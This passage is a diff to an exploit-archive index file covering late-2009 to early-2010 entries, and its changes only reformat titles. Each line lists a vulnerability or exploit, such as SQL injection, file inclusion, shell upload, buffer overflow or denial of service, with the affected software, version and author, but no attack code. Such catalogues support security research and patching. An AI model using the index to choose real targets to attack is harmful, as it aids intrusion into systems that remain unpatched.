Vulnerability",2009-12-13,"Dr.0rYX and Cr3w-DZ",php,webapps,0 10410,platforms/php/webapps/10410.txt,"phpldapadmin Local File Inclusion",2009-12-10,ipsecs,php,webapps,0 10412,platforms/php/webapps/10412.txt,"Acc PHP eMail 1.1 - CSRF",2009-12-13,bi0,php,webapps,0 -10414,platforms/php/webapps/10414.txt,"Frog v0.9.5 CSRF Vulnerability",2009-12-13,"Milos Zivanovic",php,webapps,0 +10414,platforms/php/webapps/10414.txt,"Frog 0.9.5 - CSRF Vulnerability",2009-12-13,"Milos Zivanovic",php,webapps,0 10417,platforms/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,php,webapps,0 10418,platforms/php/webapps/10418.txt,"Ele Medios CMS SQL Injection Vulnerability",2009-12-13,"Dr.0rYX and Cr3w-DZ",php,webapps,0 10419,platforms/php/webapps/10419.txt,"Chipmunk Board Script 1.x - Multiple CSRF Vulnerabilities",2009-12-13,"Milos Zivanovic",php,webapps,0 -10420,platforms/php/webapps/10420.txt,"Ez Guestbook 1.0 Multiple Vulnerabilities",2009-12-14,"Milos Zivanovic",php,webapps,0 +10420,platforms/php/webapps/10420.txt,"Ez Guestbook 1.0 - Multiple Vulnerabilities",2009-12-14,"Milos Zivanovic",php,webapps,0 10421,platforms/php/webapps/10421.txt,"Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 10422,platforms/php/webapps/10422.txt,"eoCMS <= 0.9.03 Remote FIle Include Vulnerability",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 10423,platforms/windows/local/10423.pl,"RM Downloader 3.0.2.1(.M3U File) Stack Overflow exploit",2009-12-14,"Vinod Sharma",windows,local,0 @@ -9697,7 +9697,7 @@ id,file,description,date,author,platform,type,port 10429,platforms/linux/webapps/10429.txt,"myPHPupload 0.5.1 Remote File Upload Vulnerability",2009-12-14,ViRuSMaN,linux,webapps,80 10430,platforms/linux/webapps/10430.txt,"NAS Uploader 1.0 & 1.5 - Remote File Upload Vulnerability",2009-12-14,ViRuSMaN,linux,webapps,80 10431,platforms/multiple/webapps/10431.txt,"Zabbix Agent < 1.6.7 Remote Bypass Vulnerability",2009-12-14,Nicob,multiple,webapps,80 -10432,platforms/multiple/webapps/10432.txt,"Zabbix Server Multiple remote vulnerabilities",2009-12-14,Nicob,multiple,webapps,80 +10432,platforms/multiple/webapps/10432.txt,"zabbix server Multiple Vulnerabilities",2009-12-14,Nicob,multiple,webapps,80 10433,platforms/linux/webapps/10433.txt,"Mail Manager Pro - CSRF (Change Admin Password)",2009-12-14,"Milos Zivanovic",linux,webapps,80 10434,platforms/windows/remote/10434.py,"Savant Web Server 3.1 Remote Buffer Overflow Exploit",2009-12-14,DouBle_Zer0,windows,remote,80 10436,platforms/php/webapps/10436.txt,"Link Up Gold CSRF - Create Administrator Account",2009-12-14,bi0,php,webapps,0 @@ -9708,9 +9708,9 @@ id,file,description,date,author,platform,type,port 10442,platforms/php/webapps/10442.txt,"Text Exchange Pro - [ CSRF ] Create Administrator Account",2009-12-14,bi0,php,webapps,0 10444,platforms/php/webapps/10444.txt,"mini Hosting Panel - CSRF Change Admin Settings",2009-12-14,"Milos Zivanovic",php,webapps,0 10445,platforms/php/webapps/10445.txt,"Tender System 0.9.5b LFI",2009-12-14,Packetdeath,php,webapps,0 -10446,platforms/php/webapps/10446.txt,"WSCreator 1.1 Blind SQL Injection",2009-12-14,"Salvatore Fresta",php,webapps,0 +10446,platforms/php/webapps/10446.txt,"WSCreator 1.1 - Blind SQL Injection",2009-12-14,"Salvatore Fresta",php,webapps,0 10447,platforms/php/webapps/10447.txt,"Traidnt Discovery - [CSRF] Create Staff Account",2009-12-14,G0D-F4Th3r,php,webapps,0 -10448,platforms/multiple/webapps/10448.txt,"Oracle E-Business Suite Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,webapps,0 +10448,platforms/multiple/webapps/10448.txt,"oracle e-business suite Multiple Vulnerabilities",2009-12-14,Hacktics,multiple,webapps,0 10449,platforms/asp/webapps/10449.txt,"EEGshop 1.2 - SQL Injection Vulnerability",2009-12-15,Securitylab.ir,asp,webapps,0 10450,platforms/php/webapps/10450.txt,"Linkster PHP/MySQL SQL Injection Vulnerability",2009-12-15,"Angela Zhang",php,webapps,0 10451,platforms/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom NetBiterConfig.exe Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",hardware,remote,0 @@ -9726,7 +9726,7 @@ id,file,description,date,author,platform,type,port 10463,platforms/php/webapps/10463.txt,"iGaming CMS 1.5 - CSRF Vulnerability",2009-12-15,NeX,php,webapps,0 10464,platforms/asp/webapps/10464.txt,"GalleryPal FE 1.5- Auth Bypass",2009-12-15,R3d-D3v!L,asp,webapps,0 10465,platforms/asp/webapps/10465.txt,"SitePal 1.1 - (Auth Bypass) SQL Injection Vulnerability",2009-12-15,R3d-D3v!L,asp,webapps,0 -10467,platforms/php/webapps/10467.txt,"Family Connections <= 2.1.3 Multiple Remote Vulnerabilities",2009-12-16,"Salvatore Fresta",php,webapps,0 +10467,platforms/php/webapps/10467.txt,"family connections <= 2.1.3 Multiple Vulnerabilities",2009-12-16,"Salvatore Fresta",php,webapps,0 10469,platforms/linux/dos/10469.py,"Monkey HTTP Daemon < 0.9.3 Denial of Service Vulnerability",2009-12-16,"Patroklos Argyroudis",linux,dos,80 10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 <= 1.0 - (Auth Bypass) SQL Injection Vulnerability",2009-12-16,Red-D3v1L,asp,webapps,0 10472,platforms/php/webapps/10472.txt,"Recipe Script 5.0 - Shell Upload/CSRF/XSS Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0 @@ -9768,8 +9768,8 @@ id,file,description,date,author,platform,type,port 10515,platforms/php/webapps/10515.txt,"Basic PHP Events Lister 2 Add Admin Exploit",2009-12-17,"RENO ",php,webapps,0 10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 Multiple CSRF Vulnerability",2009-12-17,bi0,php,webapps,0 10517,platforms/php/webapps/10517.txt,"Matrimony Script CSRF Vulnerability",2009-12-17,bi0,php,webapps,0 -10520,platforms/asp/webapps/10520.txt,"Active Auction House v 3.6 Blind SQL Injection Vulnerability",2009-12-17,R3d-D3v!L,asp,webapps,0 -10521,platforms/asp/webapps/10521.txt,"Active Photo Gallery v 6.2 (Auth Bypass) Remote SQL Injection",2009-12-17,R3d-D3v!L,asp,webapps,0 +10520,platforms/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection Vulnerability",2009-12-17,R3d-D3v!L,asp,webapps,0 +10521,platforms/asp/webapps/10521.txt,"Active Photo Gallery 6.2 - (Auth Bypass) Remote SQL Injection",2009-12-17,R3d-D3v!L,asp,webapps,0 10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 SQL Bypass Vulnerability",2009-12-17,bi0,php,webapps,0 10523,platforms/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 Shell Upload",2009-12-17,Stink,php,webapps,0 10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET SQL Bypass",2009-12-17,bi0,asp,webapps,0 @@ -9820,13 +9820,13 @@ id,file,description,date,author,platform,type,port 10579,platforms/multiple/remote/10579.py,"TLS Renegotiation Vulnerability PoC Exploit",2009-12-21,"RedTeam Pentesting",multiple,remote,0 10580,platforms/hardware/dos/10580.rb,"3Com OfficeConnect Routers DoS (Content-Type)",2009-12-21,"Alberto Ortega",hardware,dos,0 10582,platforms/asp/webapps/10582.txt,"Absolute Shopping Cart SQL Injection Vulnerability",2009-12-21,Gamoscu,asp,webapps,0 -10583,platforms/php/webapps/10583.txt,"Social Web CMS <= Beta 2 Multiple Vulnerabilities",2009-12-21,cp77fk4r,php,webapps,0 +10583,platforms/php/webapps/10583.txt,"social web cms <= beta 2 - Multiple Vulnerabilities",2009-12-21,cp77fk4r,php,webapps,0 10584,platforms/php/webapps/10584.txt,"PHPhotoalbum Remote File Upload Vulnerability",2009-12-21,"wlhaan hacker",php,webapps,0 10585,platforms/php/webapps/10585.txt,"webCocoon's simpleCMS SQL Injection Vulnerability",2009-12-21,_ƯNFAZCI_,php,webapps,0 10586,platforms/php/webapps/10586.txt,"VideoCMS SQL Injection Vulnerability",2009-12-21,kaMtiEz,php,webapps,0 10587,platforms/php/webapps/10587.txt,"Joomla Component com_jcalpro 1.5.3.6 Remote File Inclusion",2009-12-13,kaMtiEz,php,webapps,0 10588,platforms/php/webapps/10588.txt,"PDQ Script <= 1.0 - (listingid) SQL Injection",2009-12-21,SecurityRules,php,webapps,0 -10590,platforms/php/webapps/10590.txt,"PHPhotoalbum v0.5 SQL Injection Vulnerability",2009-12-21,Stack,php,webapps,0 +10590,platforms/php/webapps/10590.txt,"PHPhotoalbum 0.5 - SQL Injection Vulnerability",2009-12-21,Stack,php,webapps,0 10591,platforms/php/webapps/10591.txt,"Joomla Component com_mediaslide Directory Traversal Vulnerability",2009-12-21,Mr.tro0oqy,php,webapps,0 10592,platforms/php/webapps/10592.txt,"PHPOPENCHAT 3.0.2 Cross Site Scripting AND/OR FPD",2009-12-21,Dedalo,php,webapps,0 10593,platforms/windows/dos/10593.txt,"Winamp <= 5.57 Stack Overflow",2009-12-22,scriptjunkie,windows,dos,0 @@ -9834,13 +9834,13 @@ id,file,description,date,author,platform,type,port 10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 M3U Playlist Buffer Overflow Exploit",2009-12-22,data$hack,windows,local,0 10596,platforms/windows/local/10596.pl,"PlayMeNow Malformed (M3U) Universal XP Seh BoF",2009-12-22,"ThE g0bL!N",windows,local,0 10597,platforms/php/webapps/10597.txt,"Active PHP Bookmarks 1.3 - SQL Injection Vulnerability",2009-12-22,Mr.Elgaarh,php,webapps,0 -10598,platforms/php/webapps/10598.txt,"DeluxeBB <= 1.3 Multiple Vulnerabilities",2009-12-22,cp77fk4r,php,webapps,0 +10598,platforms/php/webapps/10598.txt,"deluxebb <= 1.3 - Multiple Vulnerabilities",2009-12-22,cp77fk4r,php,webapps,0 10599,platforms/php/webapps/10599.txt,"The Uploader 2.0 File Disclosure Vulnerability",2009-12-22,Stack,php,webapps,0 -10600,platforms/php/webapps/10600.txt,"mypage v0.4 Local File Inclusion Vulnerability",2009-12-22,BAYBORA,php,webapps,0 +10600,platforms/php/webapps/10600.txt,"mypage 0.4 - Local File Inclusion Vulnerability",2009-12-22,Baybora,php,webapps,0 10601,platforms/php/webapps/10601.txt,"Mini File Host 1.5 - Remote File Upload Vulnerability",2009-12-22,Mr.Z,php,webapps,0 10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 WinXP SP3",2009-12-22,d3b4g,windows,local,0 10603,platforms/windows/dos/10603.c,"TFTP Daemon 1.9 - Denial of Service Exploit",2009-12-22,Socket_0x03,windows,dos,0 -10604,platforms/php/webapps/10604.pl,"Simple PHP Blog v0.5.1 Local File Inclusion Vulnerability",2009-12-22,jgaliana,php,webapps,0 +10604,platforms/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion Vulnerability",2009-12-22,jgaliana,php,webapps,0 10606,platforms/php/webapps/10606.txt,"weenCompany SQL Injection Vulnerability",2009-12-22,Gamoscu,php,webapps,0 10609,platforms/php/webapps/10609.txt,"Aurora CMS Remote SQL Injection Exploit",2009-12-22,Sora,php,webapps,0 10610,platforms/linux/remote/10610.rb,"CoreHTTP Arbitrary Command Execution Vulnerability",2009-12-23,"Aaron Conole",linux,remote,0 @@ -9860,7 +9860,7 @@ id,file,description,date,author,platform,type,port 10628,platforms/windows/local/10628.pl,"CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3",2009-12-24,d3b4g,windows,local,0 10629,platforms/php/webapps/10629.txt,"Traidnt Gallery add Admin Exploit",2009-12-24,wlhaan-hacker,php,webapps,0 10630,platforms/multiple/webapps/10630.txt,"ImageVue 2.0 Remote Admin Login Exploit",2009-12-24,Sora,multiple,webapps,0 -10632,platforms/php/webapps/10632.pl,"Wbb3 Blind SQL Injection Vulnerability",2009-12-24,molli,php,webapps,0 +10632,platforms/php/webapps/10632.pl,"Wbb3 - Blind SQL Injection Vulnerability",2009-12-24,molli,php,webapps,0 10633,platforms/php/webapps/10633.txt,"Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability",2009-12-24,Mr.SeCreT,php,webapps,0 10634,platforms/linux/dos/10634.txt,"Picpuz <= 2.1.1 - Buffer Overflow DoS/PoC",2009-12-24,sandman,linux,dos,0 10637,platforms/asp/webapps/10637.txt,"Web Wiz NewsPad Database Disclosure Vulnerability",2009-12-24,"ViRuSMaN ",asp,webapps,0 @@ -9871,9 +9871,9 @@ id,file,description,date,author,platform,type,port 10645,platforms/php/webapps/10645.txt,"PBX Phone System 2.x - Multiple Vulnerabilities",2009-12-24,Global-Evolution,php,webapps,0 10646,platforms/windows/local/10646.c,"CastRipper (.M3U) Stack BOF WinXP SP2",2009-12-24,bibi-info,windows,local,0 10647,platforms/php/webapps/10647.txt,"VideoIsland Remote shell upload Vulnerability",2009-12-24,RENO,php,webapps,0 -10648,platforms/php/webapps/10648.txt,"cms -db <= v0.7.13 Multiple Vulnerabilities",2009-12-25,cp77fk4r,php,webapps,0 +10648,platforms/php/webapps/10648.txt,"cms -db <= 0.7.13 - Multiple Vulnerabilities",2009-12-25,cp77fk4r,php,webapps,0 10649,platforms/windows/webapps/10649.html,"SoftCab Sound Converter ActiveX Insecure Method Exploit (sndConverter.ocx)",2009-12-25,"ThE g0bL!N",windows,webapps,0 -10650,platforms/windows/dos/10650.pl,"jetAudio v 8.0.0.0 Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0 +10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 - Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0 10651,platforms/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 .asx Buffer Overflow PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0 10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 RFI Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0 10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4, Winn.ws - Cross Site Scripting Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0 @@ -9895,7 +9895,7 @@ id,file,description,date,author,platform,type,port 10673,platforms/php/webapps/10673.txt,"DieselScripts jokes Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10674,platforms/php/webapps/10674.txt,"DieselScripts jokes Backup Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10675,platforms/php/webapps/10675.txt,"webring Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 -10677,platforms/php/webapps/10677.txt,"PHPShop Version 0.6 by pass Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10677,platforms/php/webapps/10677.txt,"PHPShop 0.6 - Bypass Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10679,platforms/php/webapps/10679.txt,"quiz Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10680,platforms/php/webapps/10680.txt,"E-Pay RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10681,platforms/php/webapps/10681.txt,"Saibal Download Area 2.0 - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 @@ -9906,20 +9906,20 @@ id,file,description,date,author,platform,type,port 10686,platforms/asp/webapps/10686.txt,"CactuShop 6.0 - Database Disclosure Vulnerability",2009-12-26,LionTurk,asp,webapps,0 10687,platforms/php/webapps/10687.txt,"SaphpLesson 4.0 food RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10688,platforms/php/webapps/10688.txt,"FlatPress Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 -10689,platforms/php/webapps/10689.txt,"file upload Ar Version Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10689,platforms/php/webapps/10689.txt,"file upload Ar Version - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10690,platforms/php/webapps/10690.txt,"IMG2ASCII Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10691,platforms/php/webapps/10691.txt,"EZPX My photoblog 1.2 - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10692,platforms/php/webapps/10692.txt,"FreeForum 1.7 Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10693,platforms/php/webapps/10693.txt,"FreeForum 1.7 RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 -10694,platforms/php/webapps/10694.txt,"ES Simple Uploader v 1.1 Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10694,platforms/php/webapps/10694.txt,"ES Simple Uploader 1.1 - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10695,platforms/php/webapps/10695.txt,"Lizard Cart Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10696,platforms/php/webapps/10696.txt,"epay Backup Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10697,platforms/php/webapps/10697.txt,"e-pay 1.55 RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 -10698,platforms/php/webapps/10698.txt,"e-cart 3.0 Multiple Vulnerabilities",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10698,platforms/php/webapps/10698.txt,"e-cart 3.0 - Multiple Vulnerabilities",2009-12-26,"indoushka salah el ddine",php,webapps,0 10699,platforms/php/webapps/10699.txt,"dB Masters Multimedia Insecure Cookie Handling Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10700,platforms/php/webapps/10700.txt,"Image File Upload Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10701,platforms/php/webapps/10701.txt,"HowMany 2.6 - RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 -10703,platforms/php/webapps/10703.txt,"kooora v 3.0 AR Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10703,platforms/php/webapps/10703.txt,"kooora 3.0 - AR Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10704,platforms/php/webapps/10704.txt,"Mega Upload Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10705,platforms/php/webapps/10705.txt,"Gallery 2.3 - RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10706,platforms/php/webapps/10706.txt,"MyCart shopping cart Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 @@ -9932,18 +9932,18 @@ id,file,description,date,author,platform,type,port 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager (OmniInet.exe) Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 10716,platforms/php/webapps/10716.txt,"Datenator 0.3.0 (event.php id) SQL Injection",2009-12-26,The_HuliGun,php,webapps,0 10717,platforms/php/webapps/10717.txt,"DBHCMS - Web Content Management System 1.1.4 - RFI Vulnerability",2009-12-26,Gamoscu,php,webapps,0 -10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script Arabic Version Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script Arabic Version - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10719,platforms/php/webapps/10719.txt,"PHP Uploader Downloader 2.0 - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 -10720,platforms/php/webapps/10720.txt,"PHP Football Version : 1.0 Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10720,platforms/php/webapps/10720.txt,"PHP Football 1.0 - Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10721,platforms/php/webapps/10721.txt,"Nuked-Klan 1.7.7 RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10722,platforms/php/webapps/10722.txt,"PHP Uploader Downloader 2.0 - Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10725,platforms/php/webapps/10725.txt,"Nuke Remote SQL Injection Vulnerability",2009-12-27,FormatXFormaT,php,webapps,0 10726,platforms/php/webapps/10726.txt,"Info Fisier 1.0 - SQL Injection Vulnerability",2009-12-27,"AnGrY BoY",php,webapps,0 10727,platforms/php/webapps/10727.txt,"Smart PHP Uploader 1.0 Remote File Upload Vulnerability",2009-12-27,Phenom,php,webapps,0 -10728,platforms/php/webapps/10728.txt,"Info Fisier 1.0 multiple Vulnerabilities",2009-12-27,kaozc9,php,webapps,0 +10728,platforms/php/webapps/10728.txt,"info fisier 1.0 - Multiple Vulnerabilities",2009-12-27,kaozc9,php,webapps,0 10729,platforms/php/webapps/10729.txt,"Joomla Component com_adagency",2009-12-27,Fl0riX,php,webapps,0 10730,platforms/php/webapps/10730.txt,"Joomla Component com_intuit LFI Vulnerability",2009-12-27,Fl0riX,php,webapps,0 -10731,platforms/php/webapps/10731.txt,"Joomla Component MemoryBook 1.2 Multiple Vulnerabilities",2009-12-27,jdc,php,webapps,0 +10731,platforms/php/webapps/10731.txt,"joomla component memorybook 1.2 - Multiple Vulnerabilities",2009-12-27,jdc,php,webapps,0 10732,platforms/php/webapps/10732.txt,"PHP upload - (unijimpe) Remote File Upload Vulnerability",2009-12-27,"wlhaan hacker",php,webapps,0 10733,platforms/php/webapps/10733.txt,"com_webcamxp Cross Site Scripting Vulnerabilities",2009-12-27,Pyske,php,webapps,0 10734,platforms/php/webapps/10734.txt,"Joomla Component com_beeheard Blind SQL injection Vulnerability",2009-12-27,FL0RiX,php,webapps,0 @@ -9953,11 +9953,11 @@ id,file,description,date,author,platform,type,port 10738,platforms/php/webapps/10738.txt,"Joomla Component com_qpersonel Cross Site Scripting Vulnerabilities",2009-12-27,Pyske,php,webapps,0 10739,platforms/php/webapps/10739.txt,"Joomla Component com_oprykningspoint_mc Cross Site Scripting Vulnerabilities",2009-12-27,Pyske,php,webapps,0 10740,platforms/php/webapps/10740.txt,"Joomla Component com_trabalhe_conosco Cross Site Scripting Vulnerabilities",2009-12-27,Pyske,php,webapps,0 -10741,platforms/php/webapps/10741.txt,"Cybershade CMS 0.2 Remote File Inclusion Vulnerability",2009-12-27,Mr.SeCreT,php,webapps,0 +10741,platforms/php/webapps/10741.txt,"cybershade cms 0.2 - Remote File Inclusion Vulnerability",2009-12-27,Mr.SeCreT,php,webapps,0 10742,platforms/php/webapps/10742.txt,"Joomla Component com_dhforum SQL Injection Vulnerability",2009-12-27,ViRuSMaN,php,webapps,0 10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 (seh) Buffer Overflow Exploit (meta)",2009-12-27,dijital1,windows,local,0 -10745,platforms/windows/local/10745.c,"Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit",2009-12-27,mr_me,windows,local,0 +10745,platforms/windows/local/10745.c,"Mini-stream ripper 3.0.1.1 - (.pls) Local Universal Buffer Overflow Exploit",2009-12-27,mr_me,windows,local,0 10747,platforms/windows/local/10747.py,"Mini-Stream Exploit for Windows XP SP2 and SP3",2009-12-27,dijital1,windows,local,0 10748,platforms/windows/local/10748.rb,"Mini-Stream 3.0.1.1 Buffer Overflow Exploit (Meta)",2009-12-27,dijital1,windows,local,0 10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 SQL injection Vulnerability",2009-12-27,Gamoscu,php,webapps,0 @@ -10005,7 +10005,7 @@ id,file,description,date,author,platform,type,port 10800,platforms/php/webapps/10800.txt,"I-RATER Basic Shell Upload Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0 10802,platforms/php/webapps/10802.txt,"PicMe 2.1.0 - Upload Shell Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0 10803,platforms/php/webapps/10803.txt,"UBB Threads 6.0 - RFI Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0 -10805,platforms/php/webapps/10805.txt,"Diesel Job Site 1.4 Multiple Vulnerabilities",2009-12-30,"indoushka salah el ddine",php,webapps,0 +10805,platforms/php/webapps/10805.txt,"diesel job site 1.4 - Multiple Vulnerabilities",2009-12-30,"indoushka salah el ddine",php,webapps,0 10806,platforms/php/webapps/10806.txt,"LiveZilla 3.1.8.3 - XSS Vulnerability",2009-12-30,MaXe,php,webapps,0 10807,platforms/php/webapps/10807.txt,"XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability",2009-12-30,Palyo34,php,webapps,0 10808,platforms/php/webapps/10808.txt,"PHP-Fusion Mod avatar_studio LFI",2009-12-30,bonobug,php,webapps,0 @@ -10017,13 +10017,13 @@ id,file,description,date,author,platform,type,port 10816,platforms/php/webapps/10816.txt,"Aptgp.1.3.0c - Cross Site Scripting Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0 10817,platforms/php/webapps/10817.txt,"Joomla Component com_airmonoblock Blind SQL Injection Vulnerability",2009-12-30,Pyske,php,webapps,0 10819,platforms/asp/webapps/10819.txt,"gallery_show.asp GID suffer from Blind SQL Injection Vulnerability",2009-12-30,R3d-D3v!L,asp,webapps,0 -10820,platforms/php/dos/10820.sh,"0day Joomla Core <= 1.5.x com_component DOS",2009-12-31,emgent,php,dos,80 +10820,platforms/php/dos/10820.sh,"Joomla Core <= 1.5.x com_component - DOS (0day)",2009-12-31,emgent,php,dos,80 10821,platforms/multiple/webapps/10821.txt,"WingFTP Server 3.2.4 - CSRF Vulnerability",2009-12-30,Ams,multiple,webapps,0 10822,platforms/php/webapps/10822.txt,"Joomla Component com_rd_download Local File Disclosure Vulnerability",2009-12-30,FL0RiX,php,webapps,0 10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ưlan Servisi Database Disclosure Vulnerability",2009-12-30,LionTurk,asp,webapps,0 10824,platforms/php/webapps/10824.txt,"K-Rate SQL Injection Vulnerability",2009-12-30,e.wiZz,php,webapps,0 -10825,platforms/php/dos/10825.sh,"0day Wordpress DOS <= 2.9",2009-12-31,emgent,php,dos,80 -10826,platforms/php/dos/10826.sh,"0day Drupal DOS <= 6.16 and 5.21",2009-12-31,emgent,php,dos,80 +10825,platforms/php/dos/10825.sh,"Wordpress <= 2.9 - DOS (0day)",2009-12-31,emgent,php,dos,80 +10826,platforms/php/dos/10826.sh,"Drupal <= 6.16 and 5.21 - DOS (0day)",2009-12-31,emgent,php,dos,80 10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 SEH Exploit",2009-12-30,"Sébastien Duquette",windows,local,0 10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability",2009-12-30,"Hussin X",php,webapps,0 10829,platforms/php/dos/10829.pl,"vBulletin Denial of Service Vulnerability",2009-12-30,R3d-D3V!L,php,dos,0 @@ -10039,7 +10039,7 @@ id,file,description,date,author,platform,type,port 10839,platforms/php/webapps/10839.txt,"Classified Ads Scrip (store_info.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 10840,platforms/windows/dos/10840.pl,"VLC 1.0.3 - Denial of Service PoC",2009-12-31,"D3V!L FUCKER",windows,dos,0 10841,platforms/php/webapps/10841.pl,"pL-PHP <= beta 0.9 Local File Include Exploit",2009-12-31,cr4wl3r,php,webapps,0 -10842,platforms/windows/dos/10842.py,"SimplePlayer v0.2 0day (.wav) overflow DOS Exploit",2009-12-31,mr_me,windows,dos,0 +10842,platforms/windows/dos/10842.py,"SimplePlayer 0.2 - (.wav) overflow DOS Exploit (0day)",2009-12-31,mr_me,windows,dos,0 10844,platforms/php/webapps/10844.txt,"Joomla Component com_portfol SQL Injection Vulnerability",2009-12-31,"wlhaan hacker",php,webapps,0 10845,platforms/php/webapps/10845.txt,"fileNice php file browser RFI and LFI Vulnerabilities",2009-12-31,e.wiZz,php,webapps,0 10846,platforms/php/webapps/10846.txt,"Weatimages Directory Traversal and LFI Vulnerabilities",2009-12-31,e.wiZz,php,webapps,0 @@ -10064,7 +10064,7 @@ id,file,description,date,author,platform,type,port 10885,platforms/php/webapps/10885.txt,"Cype CMS SQL Injection Vulnerability",2010-01-01,Sora,php,webapps,0 10889,platforms/php/webapps/10889.txt,"DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability",2010-01-01,Palyo34,php,webapps,0 10891,platforms/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection Vulnerability",2010-01-01,Sora,php,webapps,0 -10897,platforms/php/webapps/10897.txt,"WD-CMS 3.0 Multiple Vulnerabilities",2010-01-01,Sora,php,webapps,0 +10897,platforms/php/webapps/10897.txt,"WD-CMS 3.0 - Multiple Vulnerabilities",2010-01-01,Sora,php,webapps,0 10899,platforms/php/webapps/10899.txt,"XlentCMS 1.0.4 - (downloads.php?cat) SQL Injection Vulnerability",2010-01-01,Gamoscu,php,webapps,0 10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes Auth Bypass SQL Injection",2010-01-01,R3d-D3v!L,php,webapps,0 10902,platforms/windows/dos/10902.pl,"Nero Express 7.9.6.4 - Local Heap PoC",2010-01-01,"D3V!L FUCKER",windows,dos,0 